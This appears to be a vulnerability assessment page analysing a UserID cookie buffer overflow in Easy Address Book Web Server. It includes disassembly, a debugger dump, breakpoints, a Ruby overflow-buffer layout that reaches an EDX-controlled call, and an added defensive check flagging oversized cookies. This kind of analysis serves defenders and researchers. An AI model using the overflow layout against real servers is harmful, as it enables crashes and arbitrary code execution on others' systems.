Attacker Value
Unknown
(1 user assessed)
Exploitability
Unknown
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown

Easy Address Book Web Server Buffer Overflow

Last updated February 13, 2020

Description

Easy Address Book Web Server suffers from a buffer overflow while processing a user-supplied cookie, specifically the UserID parameter, which allows an attacker to crash the server or gain arbitrary code execution in the context of the user running it. This was originally discovered by Tracy Turben, and was submitted to Metasploit as an exploit module by Muhammet Dilmac (of ADEOSec).


1
Technical Analysis

In addition, ```var_DE64``` is used to store the ```UserID``` information by a simple memcpy routine:

```
.text:0040F2D7 mov eax, ecx
.text:0040F2D9 mov esi, edi
.text:0040F2DB mov edi, edx
.text:0040F2DD push ebx
.text:0040F2DE shr ecx, 2
.text:0040F2E1 rep movsd
```


If ```UserID``` has a value of "AAAA", in a debugger the buffers would look like this:

```
01EEB494 41414141 AAAA
01EEB498 00000000 ….
01EEB49C 00000000 ….
01EEB4A0 00000000 ….
01EEB4A4 00000000 ….
01EEB4A8 00000000 ….
01EEB4AC 00000000 ….
01EEB4B0 00000000 ….
01EEB4B4 00000000 ….
01EEB4B8 00000000 ….
01EEB4BC 00000000 ….
01EEB4C0 00000000 ….
01EEB4C4 00000000 ….
01EEB4C8 00000000 ….
01EEB4CC 00000000 ….
01EEB4D0 00000000 ….
01EEB4D4 01000101 .
01EEB4D8 016EE168 hán ASCII “2.60 ,MyDB Engine,Copyright_2002 MGH Software Inc.”
01EEB4DC 00518470 p„Q. abws.00518470
01EEB4E0 00518470 p„Q. abws.00518470
01EEB4E4 004F2F7C |/O. abws.004F2F7C
01EEB4E8 00000250 P..
```


In the above example, the range from 01EEB494 to 01EEB4D0 is exactly 64 bytes; this is our
```var_DE64``` buffer. Right below that is our ```var_DE24```, which is what ESI points to
at the time of the crash. At the 0x10th byte of ESI is where EDX is, which is used by the
```CALL DWORD [edx+28h]``` instruction. The following code represents this:

```ruby
buf = "A" * 64         # 64 bytes for var_DE64
buf << "BBBB"          # We start overwriting var_DE24 buffer here
buf << "C" * (16-4)    # Padding for [ESI+10h] so the 16th DWORD is our DDDD
buf << "DDDD"          # EDX (which will be used by the CALL DWORD [edx+28h] instruction)
buf << "E" * (4 * 100) # Extra padding so we can see the overflow better
```

Since the overflow ends up writing an object in var_DE24 that then gets used by the function,
this results in a type confusion (a string being treated as an object).

Breakpoints

  • The first breakpoint is the alloca_probe call
  • The second breakpoint is the destination buffer for the memcpy that copies the UserID value to var_DE64
  • The third is the beginning of the vulnerable function
```
0:006> bl
 0 e 0040f10a     0001 (0001)  0:**** abws+0xf10a
 1 e 0040f2db     0001 (0001)  0:**** abws+0xf2db
 2 e 0040f0f0     0001 (0001)  0:**** abws+0xf0f0
```
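As an added example that is not part of the assessment above or of the Metasploit module, here is a Ruby check of the kind a reverse proxy, WAF rule or log-replay script could apply in front of this server: it parses the Cookie header of a raw HTTP request and flags any UserID value longer than the 64-byte var_DE64 destination buffer identified in the analysis. The 64-byte limit is the only figure taken from the write-up; the function names and the sample requests are constructed for this example.

```ruby
# Added example (not part of the original assessment or the Metasploit module).
# Request-side check for the UserID cookie handled by Easy Address Book Web Server:
# flag values that would not fit the 64-byte var_DE64 destination buffer.
# USERID_BUFFER_SIZE comes from the analysis above; the function names are hypothetical.

USERID_BUFFER_SIZE = 64

# Parse the Cookie header of a raw HTTP request into a name => value hash.
# Only the first Cookie header is considered; values are kept as raw bytes.
def parse_cookies(raw_request)
  header = raw_request.split(/\r?\n/).find { |line| line =~ /\ACookie:/i }
  return {} unless header
  header.sub(/\ACookie:\s*/i, "").split(/;\s*/).each_with_object({}) do |pair, cookies|
    name, value = pair.split("=", 2)
    next if name.nil? || name.strip.empty?
    cookies[name.strip] = value.to_s
  end
end

# Inspect one request and report whether its UserID cookie exceeds the buffer.
# Returns nil when no UserID cookie is present; otherwise a hash with the
# measured length, the limit, and how many bytes would spill past var_DE64.
def check_userid_cookie(raw_request, limit = USERID_BUFFER_SIZE)
  value = parse_cookies(raw_request)["UserID"]
  return nil if value.nil?
  {
    length: value.bytesize,
    limit: limit,
    overflow: value.bytesize > limit,
    excess: [value.bytesize - limit, 0].max
  }
end

# Run the check over a batch of requests; return [index, finding] for flagged ones.
def flag_oversized_userids(requests, limit = USERID_BUFFER_SIZE)
  flagged = []
  requests.each_with_index do |req, idx|
    result = check_userid_cookie(req, limit)
    flagged << [idx, result] if result && result[:overflow]
  end
  flagged
end

# Constructed sample traffic (not captured from a real system): a normal request,
# one without cookies, and one whose UserID is far longer than the 64-byte buffer.
SAMPLE_REQUESTS = [
  "GET /index.htm HTTP/1.1\r\nHost: 127.0.0.1\r\nCookie: SessionID=abc; UserID=1001\r\n\r\n",
  "GET /index.htm HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n",
  "GET /index.htm HTTP/1.1\r\nHost: 127.0.0.1\r\nCookie: UserID=#{'A' * 200}\r\n\r\n"
].freeze

if __FILE__ == $PROGRAM_NAME
  flag_oversized_userids(SAMPLE_REQUESTS).each do |idx, r|
    puts "request #{idx}: UserID is #{r[:length]} bytes, #{r[:excess]} past the #{r[:limit]}-byte buffer"
  end
end
```

The check measures raw bytes rather than characters because the server-side copy is a byte-wise `rep movsd`; the limit is a parameter so the same code can be pointed at a different buffer size if a patched build changes it.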
